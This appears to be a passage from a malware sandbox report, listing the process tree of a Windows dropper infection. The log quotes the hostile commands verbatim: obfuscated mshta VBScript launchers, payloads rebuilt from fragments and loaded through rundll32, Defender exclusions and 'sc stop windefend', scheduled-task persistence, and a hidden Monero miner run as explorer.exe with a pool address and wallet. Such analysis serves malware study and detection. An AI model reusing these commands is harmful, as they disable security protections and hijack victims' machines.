        C:\Users\Admin\Pictures\Adobe Films\Lb9e4kTqLaq5H6w5s875gGZL.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Lb9e4kTqLaq5H6w5s875gGZL.exe"
        7⤵
        
        PID:6424
      - C:\Users\Admin\Pictures\Adobe Films\wPZfFfsDdr7wDZJc1QQ0TXDG.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\wPZfFfsDdr7wDZJc1QQ0TXDG.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5708
      - C:\Users\Admin\Pictures\Adobe Films\0UGE9HR9MDxNDb5VGFOSQJzG.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\0UGE9HR9MDxNDb5VGFOSQJzG.exe"
        6⤵
        Executes dropped EXE
        
        PID:5892
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5892 -s 300
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6804
      - C:\Users\Admin\Pictures\Adobe Films\DEpiQfOAYIOV_W38iErqfG0p.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\DEpiQfOAYIOV_W38iErqfG0p.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4044
      - C:\Users\Admin\Pictures\Adobe Films\3TPZzBNybF1mCx6FTAfgky_P.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\3TPZzBNybF1mCx6FTAfgky_P.exe"
        6⤵
        Executes dropped EXE
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        
        PID:3416
        
        C:\Users\Admin\AppData\Local\Temp\1b6492c7-2681-4394-9dd6-9a8492becb83\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1b6492c7-2681-4394-9dd6-9a8492becb83\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\1b6492c7-2681-4394-9dd6-9a8492becb83\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        7⤵
        
        PID:6936
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1b6492c7-2681-4394-9dd6-9a8492becb83\test.bat"
        8⤵
        
        PID:6420
        
        C:\Users\Admin\Pictures\Adobe Films\3TPZzBNybF1mCx6FTAfgky_P.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\3TPZzBNybF1mCx6FTAfgky_P.exe"
        7⤵
        Executes dropped EXE
        
        PID:5292
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\3TPZzBNybF1mCx6FTAfgky_P.exe" -Force
        7⤵
        
        PID:2096
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun15f67075f27a2b5b.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4432
    - - C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun15f67075f27a2b5b.exe
        
        Sun15f67075f27a2b5b.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3192
      - C:\Users\Admin\AppData\Roaming\2444570.scr
        
        "C:\Users\Admin\AppData\Roaming\2444570.scr" /S
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2288
      - C:\Users\Admin\AppData\Roaming\3840480.scr
        
        "C:\Users\Admin\AppData\Roaming\3840480.scr" /S
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:1268
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        Executes dropped EXE
        
        PID:6116
      - C:\Users\Admin\AppData\Roaming\4791890.scr
        
        "C:\Users\Admin\AppData\Roaming\4791890.scr" /S
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4140
      - C:\Users\Admin\AppData\Roaming\8917834.scr
        
        "C:\Users\Admin\AppData\Roaming\8917834.scr" /S
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2256
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun15f1b1f8c669.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2924
    - - C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun15f1b1f8c669.exe
        
        Sun15f1b1f8c669.exe
        5⤵
        Executes dropped EXE
        
        PID:2216
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 320
        6⤵
        Drops file in Windows directory
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious use of AdjustPrivilegeToken
        
        PID:3704
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1577c3e159a3e3815.exe /mixone
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4436
    - - C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun1577c3e159a3e3815.exe
        
        Sun1577c3e159a3e3815.exe /mixone
        5⤵
        Executes dropped EXE
        
        PID:4136
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 284
        6⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:1800
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun159ff1acacf.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2604
    - - C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun159ff1acacf.exe
        
        Sun159ff1acacf.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4912
      - C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun159ff1acacf.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun159ff1acacf.exe
        6⤵
        
        PID:2256
      - C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun159ff1acacf.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun159ff1acacf.exe
        6⤵
        Executes dropped EXE
        
        PID:4088
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun152bea652bd7232.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2880
    - - C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun152bea652bd7232.exe
        
        Sun152bea652bd7232.exe
        5⤵
        Executes dropped EXE
        
        PID:1996
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun158d8ef840.exe
      4⤵
      PID:3712
    - - C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun158d8ef840.exe
        
        Sun158d8ef840.exe
        5⤵
        Executes dropped EXE
        
        PID:3316
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun158d8ef840.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun158d8ef840.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
        6⤵
        
        PID:2052
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun158d8ef840.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun158d8ef840.exe") do taskkill /F -Im "%~NxU"
        7⤵
        
        PID:1556
        
        C:\Users\Admin\AppData\Local\Temp\09xU.exE
        
        09xU.EXE -pPtzyIkqLZoCarb5ew
        8⤵
        Executes dropped EXE
        
        PID:476
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
        9⤵
        
        PID:4312
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
        10⤵
        
        PID:2392
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
        9⤵
        
        PID:6000
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
        10⤵
        
        PID:5124
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
        11⤵
        
        PID:1100
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" eCHO "
        11⤵
        
        PID:6060
        
        C:\Windows\SysWOW64\control.exe
        
        control .\R6f7sE.I
        11⤵
        
        PID:6824
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
        12⤵
        Loads dropped DLL
        
        PID:4440
        
        C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
        13⤵
        
        PID:4404
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
        14⤵
        Loads dropped DLL
        
        PID:5776
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F -Im "Sun158d8ef840.exe"
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4244
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1507db358fce61c0b.exe
      4⤵
      PID:2948
    - - C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun1507db358fce61c0b.exe
        
        Sun1507db358fce61c0b.exe
        5⤵
        Executes dropped EXE
        
        PID:4072
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 284
        6⤵
        Program crash
        
        PID:2468
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun152e52d07b74d9b5.exe
      4⤵
      PID:4328
    - - C:\Users\Admin\AppData\Local\Temp\7zS848924F3\Sun152e52d07b74d9b5.exe
        
        Sun152e52d07b74d9b5.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5004
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        
        PID:3416
        
        C:\Users\Admin\AppData\Local\Temp\inst1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
        7⤵
        Executes dropped EXE
        
        PID:4768
        
        C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
        
        "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
        7⤵
        
        PID:2620
        
        C:\Users\Admin\AppData\Roaming\5080400.scr
        
        "C:\Users\Admin\AppData\Roaming\5080400.scr" /S
        8⤵
        
        PID:2544
        
        C:\Users\Admin\AppData\Roaming\6563257.scr
        
        "C:\Users\Admin\AppData\Roaming\6563257.scr" /S
        8⤵
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        
        PID:4552
        
        C:\Users\Admin\AppData\Roaming\1059307.scr
        
        "C:\Users\Admin\AppData\Roaming\1059307.scr" /S
        8⤵
        Executes dropped EXE
        Windows security modification
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System policy modification
        
        PID:5780
        
        C:\Users\Admin\AppData\Local\Temp\0cb26b24-376c-4610-9e34-286e4db93942\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0cb26b24-376c-4610-9e34-286e4db93942\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\0cb26b24-376c-4610-9e34-286e4db93942\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        9⤵
        
        PID:7044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\0cb26b24-376c-4610-9e34-286e4db93942\test.bat"
        10⤵
        
        PID:1060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1059307.scr" -Force
        9⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:2468
        
        C:\Users\Admin\AppData\Roaming\1059307.scr
        
        "C:\Users\Admin\AppData\Roaming\1059307.scr"
        9⤵
        
        PID:6864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1059307.scr" -Force
        9⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:2828
        
        C:\Users\Admin\AppData\Roaming\4209305.scr
        
        "C:\Users\Admin\AppData\Roaming\4209305.scr" /S
        8⤵
        Executes dropped EXE
        Windows security modification
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System policy modification
        
        PID:6004
        
        C:\Users\Admin\AppData\Local\Temp\a32b43df-9164-48c5-9584-3e1cffcd1ac8\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a32b43df-9164-48c5-9584-3e1cffcd1ac8\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\a32b43df-9164-48c5-9584-3e1cffcd1ac8\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        9⤵
        
        PID:7160
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a32b43df-9164-48c5-9584-3e1cffcd1ac8\test.bat"
        10⤵
        
        PID:2752
        
        C:\Windows\system32\sc.exe
        
        sc stop windefend
        11⤵
        
        PID:3504
        
        C:\Users\Admin\AppData\Roaming\4209305.scr
        
        "C:\Users\Admin\AppData\Roaming\4209305.scr"
        9⤵
        
        PID:3988
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4668
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\4209305.scr" -Force
        9⤵
        
        PID:2380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\4209305.scr" -Force
        9⤵
        
        PID:6892
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 2612
        9⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:3128
        
        C:\Users\Admin\AppData\Roaming\6747983.scr
        
        "C:\Users\Admin\AppData\Roaming\6747983.scr" /S
        8⤵
        Executes dropped EXE
        
        PID:444
        
        C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"
        7⤵
        Executes dropped EXE
        
        PID:2448
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 240
        8⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5824
        
        C:\Users\Admin\AppData\Local\Temp\sad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sad.exe"
        7⤵
        Executes dropped EXE
        
        PID:5184
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        Executes dropped EXE
        
        PID:5448
        
        C:\Users\Admin\AppData\Local\Temp\is-FE4EG.tmp\setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FE4EG.tmp\setup.tmp" /SL5="$1028C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5720
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
        9⤵
        Executes dropped EXE
        
        PID:5872
        
        C:\Users\Admin\AppData\Local\Temp\is-GC8V6.tmp\setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-GC8V6.tmp\setup.tmp" /SL5="$30204,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:3476
        
        C:\Users\Admin\AppData\Local\Temp\is-NIJ96.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-NIJ96.tmp\postback.exe" ss1
        11⤵
        Executes dropped EXE
        
        PID:424
        
        C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"
        7⤵
        Executes dropped EXE
        
        PID:5276
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        Executes dropped EXE
        
        PID:5688
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 296
        8⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:1480
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        Executes dropped EXE
        
        PID:5852
        
        C:\Users\Admin\AppData\Local\Temp\zyl-game.exe
        
        "C:\Users\Admin\AppData\Local\Temp\zyl-game.exe"
        7⤵
        Executes dropped EXE
        
        PID:1576
        
        C:\Users\Admin\AppData\Local\Temp\3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3.exe"
        7⤵
        
        PID:2988
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        8⤵
        Loads dropped DLL
        
        PID:5696
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        Executes dropped EXE
        
        PID:5632
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:5536
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:2960
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        Suspicious use of SetThreadContext
        
        PID:5036
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:2164
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:5068
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        
        PID:2012
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:7156

C:\Windows\System32\Upfc.exe
C:\Windows\System32\Upfc.exe /launchtype periodic /cv kTrHMZfwcUWpHuvjWOSSeA.0
1⤵
PID:4648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s W32Time
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2996

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
- Modifies data under HKEY_USERS
PID:2088

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv 92GwURs0+UOTl7UTHcO7Cw.0.2
1⤵
- Modifies data under HKEY_USERS
PID:496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4072 -ip 4072
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4136 -ip 4136
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2216 -ip 2216
1⤵
PID:1548

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
1⤵
PID:5468
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"
  2⤵
  PID:5920
- - C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE
    ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u
    3⤵
    - Executes dropped EXE
    PID:5680
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
      4⤵
      PID:3700
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"
        5⤵
        
        PID:4564
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )
      4⤵
      PID:6024
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G
        5⤵
        
        PID:5928
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"
        6⤵
        
        PID:4648
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" eCHo "
        6⤵
        
        PID:1960
      - C:\Windows\SysWOW64\control.exe
        
        control ..\kZ_AmsXL.6G
        6⤵
        
        PID:1916
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
        7⤵
        Loads dropped DLL
        
        PID:6508
        
        C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
        8⤵
        
        PID:6724
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G
        9⤵
        Loads dropped DLL
        
        PID:7092
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f /Im "sfx_123_206.exe"
    3⤵
    - Kills process with taskkill
    PID:5928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 2644 -ip 2644
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5688 -ip 5688
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2448 -ip 2448
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5312

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Loads dropped DLL
PID:2392
- C:\Windows\SysWOW64\WerFault.exe
